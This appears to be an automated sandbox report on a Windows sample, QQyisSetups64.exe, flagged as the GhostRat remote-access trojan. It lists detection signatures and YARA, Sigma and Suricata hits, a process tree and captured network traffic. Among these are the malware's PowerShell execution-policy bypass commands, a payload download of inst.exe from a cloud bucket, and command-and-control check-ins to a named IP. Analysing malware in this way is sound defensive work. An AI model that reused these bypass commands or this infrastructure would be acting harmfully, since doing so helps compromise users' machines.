Edit tour

Windows Analysis Report
QQyisSetups64.exe

Overview

General Information

Sample name:	QQyisSetups64.exe
Analysis ID:	1581909
MD5:	b4f00fba3327488d4cb6fd36b2d567c6
SHA1:	4f0548a2f6bf73a85ff17f40f420098019ac05ff
SHA256:	d6a84954e038ddf4a0026705e0942fc003cfdc04e58f658a6bd9e89c37c57d18
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

GhostRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (overwrites its own PE header)

Suricata IDS alerts for network traffic

Yara detected GhostRat

AI detected suspicious sample

Bypasses PowerShell execution policy

Checks if browser processes are running

Connects to many ports of the same IP (likely port scanning)

Contains functionality to capture and log keystrokes

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to detect sleep reduction / modifications

Contains functionality to infect the boot sector

Contains functionality to inject code into remote processes

Contains functionality to inject threads in other processes

Loading BitLocker PowerShell Module

Protects its processes via BreakOnTermination flag

Queries disk data (e.g. SMART data)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

AV process strings found (often used to terminate AV products)

Checks for available system drives (often done to infect USB drives)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to clear windows event logs (to hide its activities)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Installs a global mouse hook

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sleep loop found (likely to delay execution)

Stores large binary data to the registry

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

QQyisSetups64.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\QQyisSetups64.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)

QQyisSetups64.exe (PID: 7892 cmdline: "C:\Users\user\AppData\Roaming\QQyisSetups64.exe" MD5: B4F00FBA3327488D4CB6FD36B2D567C6)

cmd.exe (PID: 8068 cmdline: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8136 cmdline: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cmd.exe (PID: 8076 cmdline: cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8180 cmdline: powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

inst.exe (PID: 1464 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)

inst.exe (PID: 2440 cmdline: C:\Users\user\Downloads\inst.exe MD5: AAA0F14BDFE3777EEE342C27DE409E6D)

svchost.exe (PID: 3964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
QQyisSetups64.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
QQyisSetups64.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\QQyisSetups64.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\QQyisSetups64.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.1456396278.0000000000403000.00000020.00000001.01000000.00000004.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000003.00000000.1279423862.00000000006F9000.00000008.00000001.01000000.00000004.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000003.00000000.1279062658.0000000000401000.00000020.00000001.01000000.00000004.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: QQyisSetups64.exe PID: 7736	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: QQyisSetups64.exe PID: 7892	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.2.QQyisSetups64.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
3.0.QQyisSetups64.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.0.QQyisSetups64.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 8136, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8068, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser", ProcessId: 8136, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3964, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Anonymous RAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T11:18:25.795527+0100	2052875	1	A Network Trojan was detected	192.168.2.7	49723	118.107.44.219	19091	TCP
2024-12-29T11:19:39.214553+0100	2052875	1	A Network Trojan was detected	192.168.2.7	49736	118.107.44.219	19091	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.5% probability

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Unpacked PE file: 3.2.QQyisSetups64.exe.400000.0.unpack

Source: QQyisSetups64.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\Desktop\QQyisSetups64.exe	File created: C:\Users\user\Desktop\Logs\QQyisSetups64.log			Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File created: C:\Users\user\AppData\Roaming\Logs\QQyisSetups64.log			Jump to behavior

Source: unknown

HTTPS traffic detected: 47.79.48.211:443 -> 192.168.2.7:49708 version: TLS 1.2

Source:	Binary string: \Release\Code_Shellcode.pdb source: QQyisSetups64.exe, QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 0000000F.00000002.2579307301.000000006D41F000.00000002.00000001.01000000.0000000E.sdmp, inst.exe, 0000000F.00000003.1479329612.0000000003991000.00000004.00000020.00020000.00000000.sdmp, 360P2SP.dll.15.dr
Source:	Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
Source:	Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
Source:	Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: QQyisSetups64.exe, QQyisSetups64.exe.3.dr
Source:	Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: QQyisSetups64.exe, 00000003.00000002.1462038578.0000000010012000.00000002.00001000.00020000.00000000.sdmp, QQyisSetups64.exe, 00000003.00000002.1460885320.0000000002860000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 0000000F.00000000.1438646907.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000000.1445063642.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe, 00000010.00000002.1460315654.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmp, inst.exe.3.dr, inst[1].exe.3.dr

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: z:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: x:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: v:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: t:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: r:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: p:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: n:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: l:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: j:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: h:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: f:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: b:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: y:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: w:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: u:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: s:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: q:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: o:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: m:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: k:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: i:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: g:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File opened: c:
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	File opened: [:	Jump to behavior

Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ACD292 _memset,FindFirstFileW,FindNextFileW,FindClose,	15_2_00ACD292
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,	15_2_00ACD71E
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,	15_2_00ADD670
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	15_2_00AD3FB0
Source: C:\Users\user\Downloads\inst.exe	Code function: 15_2_6C5EE2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,	15_2_6C5EE2B7
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,	16_2_00ADD670
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,	16_2_00ACD71E
Source: C:\Users\user\Downloads\inst.exe	Code function: 16_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	16_2_00AD3FB0

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_037880F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,

6_2_037880F0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.7:49723 -> 118.107.44.219:19091
Source: Network traffic	Suricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.7:49736 -> 118.107.44.219:19091

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 118.107.44.219 ports 18852,8853,19092,19091,3,5,8

Source: global traffic	TCP traffic: 192.168.2.7:49706 -> 118.107.44.219:8853
Source: global traffic	UDP traffic: 192.168.2.7:18434 -> 1.192.136.170:3478
Source: global traffic	UDP traffic: 192.168.2.7:18434 -> 1.192.136.171:3478
Source: global traffic	UDP traffic: 192.168.2.7:18434 -> 8.46.123.189:33500

Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0 HTTP/1.1Host: s.360.cnConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=109&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /360safe/h_inst.cab?rd=10788264 HTTP/1.1Accept: /User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)Host: pinst.360.cnConnection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219
Source: unknown	TCP traffic detected without corresponding DNS query: 118.107.44.219

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Code function: 3_2_10001BB0 InternetOpenA,InternetOpenUrlA,fopen,HttpQueryInfoW,SendMessageW,InternetReadFile,fwrite,SendMessageW,fclose,InternetCloseHandle,InternetCloseHandle,GetParent,ShowWindow,exit,

3_2_10001BB0

Source: global traffic	HTTP traffic detected: GET /inst.exe HTTP/1.1User-Agent: URLDownloaderHost: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=100&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=127&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&parent=Non-existent%20Process&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /safe/instcomp.htm?soft=1000&status=12&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: s.360.cnConnection: Keep-Alive
